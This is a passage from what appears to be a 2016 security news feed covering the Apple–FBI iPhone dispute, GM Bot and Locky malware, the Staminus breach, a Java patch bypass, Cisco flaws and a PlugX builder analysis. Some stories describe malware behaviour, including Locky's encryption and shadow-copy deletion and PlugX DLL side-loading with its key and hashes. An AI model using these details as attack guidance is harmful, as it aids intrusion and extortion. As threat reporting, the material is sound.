“Apple’s Assistance Is Necessary Without Apple’s assistance, the government cannot carry out the search of Farook’s iPhone authorized by the search warrant. Apple has ensured that its assistance is necessary by requiring its electronic signature to run any program on the iPhone. Even if the Court ordered Apple to provide the government with Apple’s cryptographic keys and source code, Apple itself has implied that the government could not disable the requisite features because it “would have insufficient knowledge of Apple’s software and design protocols to be effective.”” states the document.

“For the reasons discussed above, the FBI cannot itself modify the software on Farook’s iPhone without access to the source code and Apple’s private electronic signature. The government did not seek to compel Apple to turn those over because it believed such a request would be less palatable to Apple. If Apple would prefer that course, however, that may provide an alternative that requires less labor by Apple programmers.”

The situation is paradoxical if we read the statement of the Polk County Sheriff Grady Judd, which told journalists that he would have arrested Tim Cook for not helping the FBI to unlock the San Bernardino shooter’s iPhone.

The Apple’s lawyer Bruce Sewell expressed his position on the filling that contains requests not acceptable and defame the company.

“We help when we’re asked to. We’re honest about what we can and cannot do. Let’s at least treat one another with respect and get this case before the American people in a responsible way. We are going before court to exercise our legal rights. Everyone should beware because it seems like disagreeing with the Department of Justice means you must be evil and anti-American. Nothing could be further from the truth.” Sewell said in a statement.


The GM Bot v2 released after source leak, it is more expensive of v2
15.3.2016 BotNet

After the source code of the Android banking Trojan GM Bot was leaked online, the new version GM Bot v2 was offered for sale.
The availability of the source code of a malware in the criminal underground represents a great opportunity for crooks that can customize the threat allowing its evolution in an unpredictable way.

After the source code of the Android banking Trojan GM Bot was leaked online, a new version of the threat appeared in the wild.

In February, the experts at IBM X-Force threat intelligence discovered the source code for Android malware GM Bot was leaked on an underground. The source code was leaked in December 2015, it includes the bot component and the control panel.

Of course, the code rapidly spread within the criminal ecosystem, it now that is available online for free malware developers started to work on it.

GM Bot appeared in the wild in 2014, when the authors were offering it in the Russian underground as a powerful instrument for mobile phishing.

android malware GM Bot v2

The malware implements a number of features to target Android users, including intercepting SMS messages. The malware allows attackers to gain control of the targeted device, including the customization of fake screens.

In short, mobile banking Trojans such as GM Bot are a one-stop fraud shop for criminals:

They launch fake overlay windows that mimic bank applications to steal user credentials and payment card details.
They control the device’s SMS relay to eavesdrop, intercept and send out SMS messages.
They can forward phone calls to a remote attacker.
They have spyware features and can control the device via remote commands.
The original creator of the Android malware sold the rights to distribute GM Bot v1 (aka MazarBot) to other cyber criminal organizations that are offering it for $5000.

Other variants of GM Bot are known as MazarBot, SlemBunk, Bankosy, Acecard and Slempo.

The new GM Bot v2 variant, which is currently in a testing phase, was developed from scratch by the original developer using the moniker “GanjaMan.”

“After news from IBM X-Force about the leak of Android malware GM Bot’s source code, the author of GM Bot released a second version of the malware. News of v2 came from the official GM Bot developer and vendor, a user going by the alias GanjaMan in venues where the malware is sold.” wrote Limor Kessem, cybersecurity evangelist at IBM.

“According to an underground forum post authored by GM Bot’s vendor, it took six months’ worth of work for this updated version of GM Bot. GanjaMan adds that v2 was “written from scratch,” perhaps in order to emphasize that it does not use the previous version’s code, which was recently leaked by one of its dubious customers.”

According to the experts at the IBM Security, GanjaMan explained that GM Bot v2 includes three different Android exploits that can be used to infect mobile devices. The exploits have been already fixed by Google, so it is likely GanjaMan will add other exploits in the coming variants.

The developer announced also significant improvements for the malware, including rootkit features and the use of the Tor communication channel.

The new GM Bot v2 variant that includes all the available packages and exploits costs $15,000 and an additional $2,000 monthly rental fee that must be paid starting with the second month of use.

Cybercriminals can decide to not pay for the exploits, in this case GM Bot v2 goes for $8,000 and a $1,200 monthly rental fee.

“Judging by past cases of underground malware vendors, the monthly rental fees are most likely technical support fees. Trojan vendors have been known to run into debilitating operational issues as a result of having to provide support to their buyers without getting paid for the extra time spent on resolving issues, bugs and technical questions. The monthly fee concept helps the developers hire tech support agents to handle requests while they continue to develop and sell the malware,” continues Kessem.

GanjaMan is also searching for peers pay-per-install accomplices and cybercriminals who can help with directing Web traffic in countries his buyers would be interested in targeting.

Stay Tuned.


Microsoft Quietly Stops Accepting Bitcoin in Windows Store
14.3.2016 Safety
Microsoft reckoned Bitcoin was the future of payment system and added it as a payment option for Windows store at the end of 2014, but the company has silently pulled support for Bitcoin in the Windows 10 Store.
In November 2014, Microsoft struck a deal with third-party bitcoin payment processor 'Bitpay' that allowed people to use Bitcoin to purchase Microsoft’s products and services from Windows Stores.
However, Microsoft quietly updated the Windows Store FAQ that popped up "Microsoft Store doesn't accept Bitcoin."
The end of support for Bitcoin payments only applies to Windows 10 and Windows 10 Mobile stores.
"Microsoft Store doesn't accept Bitcoin. You can no longer redeem Bitcoin into your Microsoft account," the update reads. "Existing balances in your account will still be available for purchases from Microsoft Store, but can't be refunded."
In short, you can make use of an existing balance in your account to buy your choice of apps from Windows store, but you can not add more Bitcoins or get a refund of your remaining balance.
So, you like it or not, from now on, you will have to use conventional money when buying apps or products from Windows 10 and Windows 10 Mobile stores.
Microsoft has not explained the sudden change in its policy. Bitpay is still operating, which indicates that there is no sour relationship between the company and Bitpay.
Microsoft's change of mind could be due to less number of people buying with virtual cash that gave the company no reason to continue keeping Bitcoin as a supported digital currency.
An official statement from Microsoft is not yet available, so let us wait what the company says about this sudden change.


FBI threatens to Force Apple to Hand Over iOS Source Code
14.3.2016 iOS
The Department of Justice (DoJ) has warned Apple that it may force the tech giant for handing over the source code to the complete operating system if it does not help the Federal Bureau of Investigation (FBI) unlock the San Bernardino shooter's iPhone.
Apple is battling with the FBI over iPhone encryption case. The federal investigators needs Apple's assistance to unlock an iPhone 5C belonging to San Bernardino shooter Syed Rizwan Farook.
However, Apple CEO Tim Cook has said explicitly that providing a backdoor would likely open up the company's iPhones to not just the federal agents, but also to malicious hackers who could use it for evil purposes.
On Thursday, Apple and the FBI head to another court hearing on the San Bernardino iPhone case.
The DOJ's latest 43-page brief filing contains an implicit threat that if Apple does not create the vulnerable version of its iOS operating system needed to bypass the passcode protection on the terrorist iPhone 5C, the government could force the tech giant to hand over both:
Source Code to iOS
Electronic Signature iPhones need to run modified software
...so that the FBI's own programmers could create its own backdoored version of iOS with the security features stripped out and then stamped it with Apple's electronic signature.
The DOJ filing reads in part:
"For the reasons discussed above, the FBI cannot itself modify the software on Farook's iPhone without access to the source code and Apple's private electronic signature. The government did not seek to compel Apple to turn those over because it believed such a request would be less palatable to Apple. If Apple would prefer that course, however, that may provide an alternative that requires less labor by Apple programmers."
The DoJ then goes on to cite a previous court ruling in which Ladar Levison – the owner of the secure email service Lavabit used by whistleblower Edward Snowden – was hit with contempt sanctions for failing to comply with a court order requiring assistance on encrypted email which included "producing a private SSL encryption key."
Meanwhile, Polk County Sheriff Grady Judd told reporters that he would have jailed the CEO of Apple for not assisting the FBI to unlock the terrorist's iPhone.
Needless to say, Apple's top lawyer Bruce Sewell categorized the filling as an offensive attempt to "vilify Apple" on unsubstantiated theories with "false accusations and innuendo."
"Everyone should beware, because it seems like disagreeing with the Department of Justice means you must be evil and anti-American," Sewell said in a statement. "Nothing could be further from the truth."
Both sides are playing too hard, in both the legal battle as well as rhetoric. The DOJ yesterday accused Apple of being "false" and "corrosive" and Apple responded by accusing the government to become "so desperate at this point that it has thrown all decorum to the wind."
Now, let's see where this battle ends.


Anti-DDoS Firm Staminus HACKED! Customers Data Leaked
14.3.2016 Hacking
Staminus Communications – a California-based hosting and DDoS (Distributed Denial of Service) protection company – is recovering a massive data breach after hackers broke down into its servers and leaked personal and sensitive details of its customers.
Though the company acknowledged that there was a problem in a message posted to Twitter on Thursday morning, it did not specify a data breach.
Staminus's website went offline at 8 am Eastern Time on Thursday, and on Friday afternoon, a representative said in a Twitter post that "a rare event cascaded across multiple routers in a system-wide event, making our backbone unavailable."
What type of information?
The dump of information on Staminus' systems includes:
Customer usernames
Hashed passwords
E-mail addresses
Customer real names
Customer credit card data in plain text
Customer support tickets
Server logs data
Chat logs
Source code of some of the company's services including Intreppid
Staminus' main database
Database of one of Staminus' clients, the Ku Klux Klan (KKK)
The data was posted on the Internet Friday morning, and some Staminus customers who wish to remain anonymous confirmed that their data was part of the leaked data dump.
However, the company says it does not store or collect its customers' Social Security numbers (SSNs) or tax IDs, so they are safe from the data breach.
What happened?
The Staminus data breach occurred after hackers infiltrated the company's server backbone, seized control of Staminus' routers and then reset them to factory settings, which effectively brought down the company's entire network.
The hackers also stole the company's database and dumped it online. Links to downloads of the internal Staminus data were published in a file sarcastically headlined, "TIPS WHEN RUNNING A SECURITY COMPANY," detailing the security holes (given below) found during the data breach:
Use one root password for all the boxes
Expose PDU's [power distribution units in server racks] to WAN with telnet auth
Never patch, upgrade or audit the stack
Disregard PDO [PHP Data Objects] as inconvenient
Hedge entire business on security theatre
Store full credit card info in plaintext
Write all code with wreckless abandon
How many customers affected?
Although the total number of victims has not been known yet, Forbes reported that the data breach included at least 15 gigabytes worth of data belonging to Staminus.
Security researcher Nathan Malcolm from Sinthetic Labs told the publication that he analysed the data dump and found unencrypted credit card numbers, expiry dates and CVVs for as many as 1,971 Staminus customers.
What was the motive for the breach?
Potential motives for hacking Staminus are quite easy to figure out.
Staminus' clients include the white supremacist group Ku Klux Klan (www.kkk.com). The company also hosts several IRC (Internet Relay Chat) channels for large-scale DDoS attack services, Krebs noted.
What was the company's response?
Staminus CEO Matt Mahvi published the following statement on the Staminus website (which again went offline), confirming the data breach.
"We can now confirm the issue was a result of an unauthorized intrusion into our network. As a result of this intrusion, our systems were temporarily taken offline and customer information was exposed. Upon discovering this attack, Staminus took immediate action including launching an investigation into the attack, notifying law enforcement and restoring our systems.
Based on the initial investigation, we believe that usernames, hashed passwords, customer record information, including name and contact information, and payment card data were exposed. It is important to note that we do not collect Social Security numbers or tax IDs.
While the investigation continues, we have and will continue to put additional measures into place to harden our security to help prevent a future attack. While the exposed passwords were protected with a cryptographic hash, we also strongly recommend that customers change their Staminus password."
Staminus' website came back online and believed to be wiped clean, but at the time of writing the website is still unavailable.
What victims should do?
Staminus customers are recommended to review their credit card statements carefully and to report any unauthorized bank transactions.
Meanwhile, Staminus has also advised its customers to reset all their account passwords once the service is fully operational once again.


Florida Sheriff threatens to Arrest 'Rascal' Tim Cook if He Doesn't Unlock the iPhone
14.3.2016 Apple
The legal battle between Apple and the Federal Bureau of Investigation (FBI) is turning ugly with each passing day.
Apple is fighting with the federal authorities over iPhone encryption case. The Federal Bureau of Investigation (FBI) requires Apple’s assistance to unlock an iPhone 5C belonging to San Bernardino shooter Syed Rizwan Farook.
Apple CEO Tim Cook has said explicitly that providing a backdoor would likely open up the company’s iPhones to not just the federal agents, but also to malicious hackers who could use it for evil purposes.
Now the Apple's decision not to comply with the court order has provoked a Florida sheriff, who has threatened to arrest Tim Cook if he gets the chance.
Sheriff Vows: I'll Lock the Rascal up.
During a Wednesday press conference, when Polk County Sheriff Grady Judd was asked about Cook's refusal to help create a custom operating system that would assist the FBI to circumvent security measures on terrorist iPhone 5C, he told reporters that Cook required knowing he's not above the law.
Here's what Judd said about Apple Vs. FBI case:
"You can't create a business model to go, 'We are not paying attention to the federal judge or the state judge. You see, we are above the law,'" said Judd quoted by FOX 13. "The CEO of Apple needs to know he's not above the law, and neither is anybody else in the United States."

Judd comments came while discussing a recent murder case where the suspects took photos of the victim on their phones. He said that the case was made easier by the brothers' decision to show those photographs.
Though the murder case Judd was discussing involved neither an iPhone nor a phone hacking, he noted that if he were to deal with locked iPhones in the future, he would put Cook behind bars under a contempt of court order.
"I can tell you, the first time we do have trouble getting into a cell phone, we're going to seek a court order from Apple," he said. "And when they deny us, I am going to go lock the CEO of Apple up. I'll lock the rascal up."
However, we could not say the sheriff was labeling Tim Cook as Rascal, but he apparently said that if he could get a chance, he might have arrested Cook for not helping authorities with backdoors.


Placing a skimmer on Gas Station Card Scanner in less than 3 seconds
14.3.2016 Incindent

Attack ATM is very simple for criminals, a video released by Miami Beach Police shows two men installing a credit card skimmer in less than 3 seconds.
In October, the CENTRAL MEANS OF PAYMENT ANTIFRAUD OFFICE (UCAMP) of the Italian Ministry of Economy and Finance released the annual report on Payment card frauds.

This year I was one of the experts who worked on the MEF – Annual Report on Payment Card Frauds No. 5/2015, an interesting document full of detailed data on the phenomena of payment card frauds. The document focus on payment card frauds (unrecognized transactions) issued in Italy and used everywhere.

Credit card frauds are a global emergency, ATMs are a privileged target of cyber criminals worldwide, we discussed several times about illegal practices used by crooks to steal credit card data. ATM hacking, ATM malware and also about ATM skimming are the most common type of attack against these machines.

Unfortunately, the attack against an ATM is very simple for criminal organizations, a video recently released by Miami Beach Police shows two men installing a credit card skimmer at a local gas station in less than three seconds.

The video shows how a criminal crew goes into action while the store clerk is serving one customer, which it is actually an accomplice.

The man keeps is face far from the camera, protecting it with a cap while the accomplice tampers with the ATM.

Just three second to completely compromise payment card terminal by attaching a skimmer that allows the crooks to steal credit card data from every customer of the store.

In the specific case, the skimmer was storing the stored card data locally, for this reason, the criminals will return to dismount the device. The most sophisticated gang user skimmers that are able to transfer data via Bluetooth once it has been stolen from the card.

Card data are then offered in the cyber criminal underground or to clone payment cards and use them to purchase items that can be resold quickly, like electronic devices, gift cards and luxury items.

ATM skimming video

Source – CBS Miami

The theft of credit card data is a particularly worrying phenomenon, especially in the US where the merchants are slightly moving to the EMV standard that is considered more secure because new payment cards will use a built-in chip to authorize the transactions.

Payment card frauds in the U.S. account for nearly 50 percent of global fraud losses, according to the Nilson Report; security experts maintain that the main reason is that the country is the last in the world to implement the EMV (EuroPay, MasterCard, and Visa).

Fortunately, the situation is changing also in the U.S., where the banking consumers are about to benefit from EMV against payment frauds, too.

The deadline for the move to EMV was October 1, 2015, but my merchants are still in delay and in many cases retailers still allow customers to swipe their cards.

Despite the enormous improvement introduced with EMV, we cannot consider it as a complete remediation against card frauds, in particular against “Card-Not-Present” (CNP) frauds.

EMV still doesn’t protect users when dealing with e-commerce or mobile commerce platforms.

“The reality is EMV credit cards cannot prevent PoS RAM Scraper attacks. EMV was developed to prevent credit card counterfeiting and not RAM scraping. If the EMV credit card’s Tracks 1 and 2 data are sent to the PoS system for processing, it will become susceptible to RAM scraper attacks because the decrypted data resides in RAM,” states a blog post published by Trend Micro.


The leader of the Team GhostShell collective revealed his identity
14.3.2016 Hacking

G.Razvan Eugen is a 24 year-old Romanian that claims to be the founder of the collective Team GhostShell that hacked numerous entities worldwide.
Do you remember the notorious Team GhostShell hacking crew?

GhostShell is a group of hacktivists most active in 2012 that targeted systems worldwide, the list of victims is long and includes the FBI, NASA, the Pentagon, and the Russian government.

Three years ago the group launched its last attack, we had no news about the popular hackers since 2015 when the Team GhostShell conducted a number of cyber attacks against various targets, including the Smithsonian photo contest website, The Church of Jesus Christ of Latter-day Saints, Socialblade, and the Exploratorium in San Francisco.

Now the TheNextWeb was approached by a man claiming to be the leader of the popular hacker collective. The man used the name ‘White Fox’ and a generic Yahoo email address.

The moniker White Fox is not new, in 2012, GhostShell Team claimed responsibility for a number of attacks conducted under the operation dubbed #ProjectWhiteFox.

The hackers leaked roughly 1.6 million records and accounts from a wide range of companies operating in different sectors such as aerospace, nanotechnology, banking, law, military, education and government. Below the list of the targets hacked by the hacktivits:

The European Space Agency
NASA’s Engineers: Center for Advanced Engineering
Federal Reserve
The Pentagon
Credit Union National Association (CUNA)
Crestwood Technology Group – CTG123
Bigelow Aerospace
California Manufacturers & Technology Association – CMTA.net
Aerospace Suppliers
World Airport Transfers
General Dynamics Defense Systems – GD-OtsCanada
Zero-Max – Manufacturer of parts
MicroController Shop
Jp Chem eData
Human Security Gateway
NanoConference
Hamamatsu
HMI CronPowder
Defense Contractor for the Pentagon – DPAtitle3
Business Consultancy dealing mostly with military personnel – Drum Cussac
Institute of makers of explosives – IME
Texas Bankers
After a first contact, the journalist Emil Protalinski was added by the man to an email list that included other cyber security journalists from principal online magazines.

Then the man revealed his true identity, his name is G.Razvan Eugen, a 24 year-old Romanian and he claims to be the founder of the Team GhostShell

GhostShell Team identity

Eugen demonstrated to be a member of the Team GhostShell by providing evidence of access to the Pastebin account used by the hacking group, the same used by the official GhostShell Twitter account (@TeamGhostBin) to leak stolen data before it was suspended by Twitter.

Team GhostShell PasteBIN

Eugen also gave information about the private @DeadMellox Twitter account he had been using to communicate for several years and other email accounts he used while was leading the group.

“Overall, we can’t with 100 percent certainty say that Eugen’s claims are correct, and that he is indeed GhostShell, but the case is pretty compelling.” wrote the TNW
“I just want to own up to my actions, face them head on and hope for the best. What I really want is to continue being part of this industry. Cybersecurity is something that I enjoy to the fullest even with all the drama that it brings and legal troubles.

In return I hope other hackers and hacktivists take inspiration from this example and try to better themselves. Just because you’ve explored parts of the internet and protested about things that were important to you doesn’t mean you should be afraid and constantly paranoid of the people around you.” Eugen told to the journalist.
Eugen added that “[other Team GhostShell members] were never directly involved in the main projects/leaks. 99 percent of them are from me.”

The Eugen coming out is very risky, he risks several years in prison … let’s see what will happen.


Hacking mechanic’s workshop to infect cars
14.3.2016 Hacking

Hacking mechanic’s workshop to infect cars, this is the concept behind a new attack technique devised by the hacker Craig Smith.
It might seem far-fetched, it looks like the hacker Craig Smith was able to design a malicious code that could infect computers used in the mechanic’s workworkshop, and these machines can later start infecting other vehicles that are going for service.

Craig Smith is the founder of the Open Garages, a Vehicle Research Labs (VRL) focused around understanding the increasingly complex vehicle systems. He spends a lot of his time, warning car makers that there is a need to open up their software to owners, to allow them to modify their cars, he is also a member of the I Am The Calvary initiative.

During 2015, Craig Smith presented the world a proof-of-concept code that allows an attacker to infect the car with a malware that could be used also to compromise the computers at the repair workshops. Smith continued to work on his own attack and now the malware used in his proof-of concept was improved in terms of machine learning capabilities. The expert claims that now an attacker without a deep knowledge could use the malware and launch successfully attacks.

“These (mechanics) tool have the codes to read and write firmware and if it is compromised by a malicious car it can modify the firmware of other cars that come in afterwards,” Smith told Vulture South at the Nullcon security conference in Goa, India, as reported by El-Reg.

“There are easier ways to compromise a car dealership – shoddy wifi, whatever – but this is the kind of thing that needs to be considered by anyone making these tools.”

Hacking mechanic's workshop

How does the malware work?

The malware uses a learning mode, to monitor traffic between the Workshop’s computer and the car, and finds out potential modules. Modules where the diagnosis tool was able to contact with success are in blue, and all the findings are saved to a .ini file, alongside with the captured packets.

“It sorts through all the complex stuff for you and just highlights the packets and as a a researcher that is really useful.”

After the learning mode, the malware can switch to the attack mode, and starts fuzzing the information got in the learning mode,

“Everything is point and click up to this point so if there’s a crash you’re going to have to go and figure out what caused it,”.

Even if many details are missing, we can understand that this proof-of-concept if applied to the real word, can be create a lot of damaged if in the wrong hands.

Car makers need to do a bigger effort in allowing hackers to work with them towards understanding their software, and in my opinion maybe even allowing a restrict group of security professions to have full access to cars maker’s software to assess it and find security vulnerability before black hat do it.


CVE-2013-5838 Java flaw is back two-year later due to broken patch

14.3.2016 Vulnerebility

The patch for the critical Java CVE-2013-5838 vulnerability released by Oracle in 2013 is ineffective and can be easily bypassed.
Bad news for Java users, in 2013 Oracle released a patch to fix the CVE-2013-5838 vulnerability, but security experts discovered that it could be easily bypassed to compromise the latest versions of the software.
This means that attackers can exploit again the same vulnerability hacking machines running the latest versions of Java.

The CVE-2013-5838 was rated by Oracle 9.3 out of 10 because it could be exploited remotely by unauthenticated users to completely compromise a vulnerable system.

Security experts at the Security Explorations firm who originally discovered the flaw confirmed that the Oracle patch for the Java flaw is broken and an attacker can trigger the vulnerability to escape from the Java security sandbox.

“At the end, it’s worth to note that Issue 69 (CVE-2013-5838) was also improperly evaluated by Oracle in terms of a vulnerability impact. Oracle Critical Patch Update from Oct 2013 indicated that Issue 69 could “be exploited only through sandboxed Java Web Start applications and sandboxed Java applets” (Fig. 4).” states a report published by Security Explorations. “This is not true. We proved that Issue 69 could be successfully exploited in a server environment as well such as Google App Engine for Java [2].”

CVE-2013-5838 java vulnerability patch

The security patch can be easily bypassed by hackers as demonstrated in a proof-of-concept exploit code released in 2013 by the researchers at Security Explorations.

“According to Oracle, the vulnerability was addressed by a backported (from JDK 8) implementation of the affected component (method handles API) in JDK 7 Update 40 from Sep 2013.” CEO Adam Gowdiak wrote in a message sent to the Full Disclosure security mailing list.

“We however found out that Oracle patch could be trivially bypassed with the use of the following:
– four character change to our original POC code published in Oct 2013,
– a custom HTTP server enforcing “404 (Not Found)” error when requesting a given class for the first time.”

The new PoC exploit code works on the latest available versions of Java, including Java SE 7 Update 97, Java SE 8 Update 74 and Java SE 9 Early Access Build 108.

The bad news it that the CVE-2013-5838 flaw could be exploited also to target server environment.

“We verified that it could be successfully exploited in a server environment as well as in Google App Engine for Java,” added Gowdiak.

In a real attack scenario, the attackers would need to find a separate flaw that allows them to run the attack in a stealth mode bypassing the security prompts or to convince users into approving the execution of the exploit code.

There is no information regarding the way Oracle intends to solve the problem, likely by pushing out an emergency patch, otherwise we need to wait until the next quarterly Critical Patch Update, scheduled for April 19.


A new massive spam campaign is spreading Locky ransomware downloaders
13.3.2016 Virus

Experts at Trustwave observed a new massive spam campaign that was sending a JavaScript attachment that downloads Locky ransomware.
Ransomware continues to be among most insidious threats in this first part of the year, security researcher have recently observed a spike in the number of Locky ransomware infections.

The experts from Trustwave security firm highlighted the worrying intensification around this threat.

The security researchers observed a new massive spam campaign serving Locky ransomware downloaders in the form of JavaScript attachments.

According to Trustwave, spam campaign aiming to spread malware has represented 18 percent of total spam in the last weeks, while typically this specific kind of spam represents less than 2 percent of total spam.

The experts linked the increment to the diffusion of ransomware JavaScript downloaders, Trustwave also noticed that the malicious spam was concentrated in bursts.

“Our Spam Research Database saw around 4 million malware spams in the last seven days, and the malware category as a whole accounted for 18% of total spam arriving at our spam traps.” states a blog post published by Trustwave. “The graph below shows hourly spam traffic for the malware category for the past 30 days – note the relatively low levels of activity to the left, and huge peaks on the right, representing the ransomware downloader campaigns. As you can see the campaigns are not continuous, but concentrated bursts, with peaks of 200K emails hitting our servers in a single hour.”

Locky Ransomware spam campaign

The researchers discovered that the Locky ransomware was spread through the same botnet used to spread the Dridex trojan.

“These campaigns are coming from the same botnet responsible for previously spammed documents with malicious macros which downloaded the Dridex trojan. The actors behind the campaigns have merely changed the delivery mechanism (.js attachment) and the end malware (ransomware).” states the report published by Trustwave.

The threat actors simply changed tactic and malware, in the case os Dridex they used email attachment disguised as an invoice, typically documents embedding malicious macro, the recent Locky ransomware campaign relies on JavaScript attachment that downloads the Locky code.

The Locky ransomware uses AES encryption algorithm to encrypt both local files and files on network shares, even if they are unmapped.

When started, Locky creates and assigns a unique 16 hexadecimal number to the infected machine, then he will scan all drives and unmapped network shares for files to encrypt.

The malware uses the AES encryption algorithm and encrypts only file with extensions matching a certain criteria while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).

The Locky ransomware encrypts files renaming the to [unique_id][identifier].locky, the researchers also discovered that the unique ID and other information are embedded at the end of the encrypted file.

The malware will also delete all of the copies of documents in the Shadow Volume, making impossible to restore files.

“Inside the Locky ransom notes are links to a Tor site called the Locky Decrypter Page. This page is located at 6dtxgqam4crv6rr6.onion and contains the amount of bitcoins to send as a payment, how to purchase thebitcoins, and the bitcoin address you should send payment to. Once a victim sends payment to the assigned bitcoin address, this page will provide a decrypter that can be used to decrypt their files.” BleepingComputer reports in a blog post.


CISCO warns customers of high-severity flaws in modems and gateways
13.3.2016 Vulnerebility

Cisco released a series of software updates to patch several high severity flaws in its cable modems, residential gateways and security appliances.
Cisco just patched critical vulnerabilities in its cable modems, residential gateways and security appliances.

The security updates released this week fix serious flaws in Cisco residential reported by Kyle Lovett, and Chris Watts from Tech Analysis firm.

Kyle Lovett has found an information disclosure vulnerability (CVE-2016-1325) that allows a remote unauthenticated attacker to access sensitive data on vulnerable CISCO devices (Cisco DPC3941 Wireless Residential Gateway with Digital Voice and the DPC3939B Wireless Residential Voice Gateway).

“A vulnerability in the web-based administration interface of the Cisco Wireless Residential Gateway could allow an unauthenticated, remote attacker to access sensitive information on the affected device. ” states the CISCO advisory. “The vulnerability is caused by improper access restrictions implemented on the affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device.”

Chris Watts discovered another a denial-of-service (DoS) flaw (CVE-2016-1326) affecting the Cisco DPQ3925 8×4 DOCSIS 3.0 Wireless Residential Gateway that could be exploited by a remote unauthenticated attacker to cause the device to become unresponsive.

“A vulnerability in the web-based administration interface of Cisco Model DPQ3925 8×4 DOCSIS 3.0 Wireless Residential Gateway with EDVA could allow an unauthenticated, remote attacker to cause the device to become unresponsive and restart, creating a denial of service (DoS) condition.” states the Cadvisory.

Watts also discovered a second remote code execution vulnerability (CVE-2016-1327) in Cable Modem with Digital Voice models DPC2203 and EPC2203 that can be exploited by a remote attacker to trigger a buffer overflow and run execute arbitrary code by sending a specially crafted HTTP request to vulnerable devices.

“A vulnerability in the web server used in the Cisco Cable Modem with Digital Voice Model DPC2203 could allow an unauthenticated, remote attacker to exploit a buffer overflow and cause arbitrary code execution.” states the CAdvisory.

“The vulnerability is due to improper input validation for HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device.”

CISCO warned its customers also about a DoS vulnerability (CVE-2016-1312) affecting the HTTPS inspection engine of the Cisco ASA Content Security and Control Security Services Module (CSC-SSM). The flaw affects the way the devices handle HTTPS packets, allows a remote unauthenticated attacker to reload affected devices by flooding it with HTTPS packets.

“A vulnerability in the HTTPS inspection engine of the Cisco ASA Content Security and Control Security Services Module (CSC-SSM) could allow an unauthenticated, remote attacker to cause exhaustion of available memory, system instability, and a reload of the affected system. ” reports the advisory.

“The vulnerability is due to improper handling of HTTPS packets transiting through the affected system. An attacker could exploit this vulnerability by sending HTTPS packets through the affected system at high rate. “

If you or your organization uses one of the vulnerable devices affected by the vulnerabilities apply the security updates.


PlugX malware: A good hacker is an apologetic hacker
13.3.2016 Virus
It happens that malware writers and other miscreants in the digital world put messages in their malware. Sometimes they do it just for the “lulz”, sometimes to insult a person who hampers their criminal business, sometimes to deliver information to the guys on the other side who oppose them. We hope the case described in this blogpost falls into the first category, i.e. funny message. At least it seemed funny for us.

Our first research into PlugX was published in 2012 – since then this remote access tool (RAT) has become a well-known instrument used in a series of attacks all over the globe targeting multiple industry verticals. PlugX has been detected in targeted attacks not only against military, government or political organizations but also against more or less ordinary companies. In 2013, we discovered that the Winnti group responsible for attacking companies in the online gaming industry has been using the PlugX remote administration tool since at least May 2012.

This time, looking through some anomalous PlugX samples, we stumbled upon one specimen that had an RC4 encoded resource inside. Actually, it turned out to be a test sample with dummy settings. Luckily, it was quite easy to find the initial builder that generates such samples.

 

Basically, the builder compiles a handful of different PlugX droppers, including the notorious SFX RAR archives containing the PlugX trinity – a legitimate signed executable susceptible to a DLL side-loading attack, a DLL that is picked up by an executable and the payload file that maintains all the juicy stuff – the PlugX functional library, C2s and other settings.

One such trinity includes Lenovo’s RGB LCD Display Utility for ThinkPad: tplcdclr.exe, wtsapi32.dll (loaded by the application) and the “payload” file wts.chm (loaded by the DLL).

 

PlugX malware: A good hacker is an apologetic hackerLegitimate executable from the first PlugX trinity

Another set of three includes a signed version of Steve Gibson’s Domain Name System Benchmarking Utility sep_NE.exe, the winmm.dll file, which the application is dependent on, and the “payload” file sep_NE.slf.

 

PlugX malware: A good hacker is an apologetic hackerLegitimate executable from the second PlugX trinity

 

But among all the droppers that the builder generates there are two templates posing as executables, with the data maintained usually in a separate “payload” file, embedded in the initial body of the file as a resource.

 

The “payload” stuff is kept in encrypted form in the file body. After decryption, this stuff looks like one of the usual PlugX “payload” files, those with easily recognizable shellcode at the beginning:

 

The algorithm used to encrypt the payload resource is RC4. And finally (and this is what impelled us to write this blogpost) – the RC4 key for the resource decryption – “SORRY.i_have_to_do_this“.

 

Hmm, interesting… That’s not the message one might expect to find in APT malware that has swamped almost every vertical in nearly every corner of the world. There have been investigations into the infamous PlugX developer in the past. We also have found a number of malware families that are related in some way to PlugX and have likely been developed by the same person. All together it seems that this person has been quite busy in generating malware for different Chinese-speaking APT groups for a long time. That’s obviously a job, already work with no room for sentiment. That’s why the text looks inappropriate here. Unless the malware writer was in a playful mood and had put this in for trolling.

There’s a second option that occurs. Since this is a dropper feature, the dropper for the PlugX could have been developed by another person, not the PlugX developer. In an ordinary cybercriminal hierarchy there are, for example, developers of a bot, ransomware, etc. and packers who create wrappers/droppers to try and allow the core malware to evade AV detection.

Probably some other person, who is not yet such a veteran in the Chinese-speaking APT world and still sees the malware writing practice as some sort of game, was just kidding around.

If you use your imagination, we’re sure you’ll be able to come to your own interesting or quirky conclusions as to how that message ended up in these PlugX droppers. In any case, we really hope this was a bit of fun and not a cry for help from some desperate person forced by circumstances to do bad things.

We detect samples generated by the builder and the builder itself with following modifications of the Gulpix family:
Backdoor.Win32.Gulpix.ajp
Backdoor.Win32.Gulpix.ams
Backdoor.Win32.Gulpix.axe
Backdoor.Win32.Gulpix.axf
Backdoor.Win32.Gulpix.axg
Backdoor.Win32.Gulpix.axi
Backdoor.Win32.Gulpix.axj
Backdoor.Win32.Gulpix.axm
Backdoor.Win32.Gulpix.axn
Backdoor.Win32.Gulpix.axo

And two heuristic verdicts:
HEUR:Trojan.Win32.Generic
HEUR:Trojan.Win32.Invader

The builder MD5 hash is e57691e4f220845df27806563c7dca0b.

Legitimate executables included in PlugX trinities mentioned in the blog-post:
ce2ae795117e54ca8403f86e7a3e19a7 – DNS Benchmark Utility;
d9978f95ce30e85943efb52c9c7d731b – Lenovo’s ThinkPad Display Utility tplcdclr.exe.


Reuters – Malware suspected in the Bangladesh central bank heist
13.3.2016 Virus

Investigators suspect the attackers behind the Bangladesh central bank ‘s hack have used a malware to gather information for the Fed’s heist.
One of most intriguing stories this week is the hack of the Bangladesh account at the Federal Reserve Bank of New York.

The Bangladesh’s Finance Minister Abul Maal Abdul Muhith accused the U.S. Federal Reserve of the theft of at least $81 million stolen from the Bangladesh’s account.

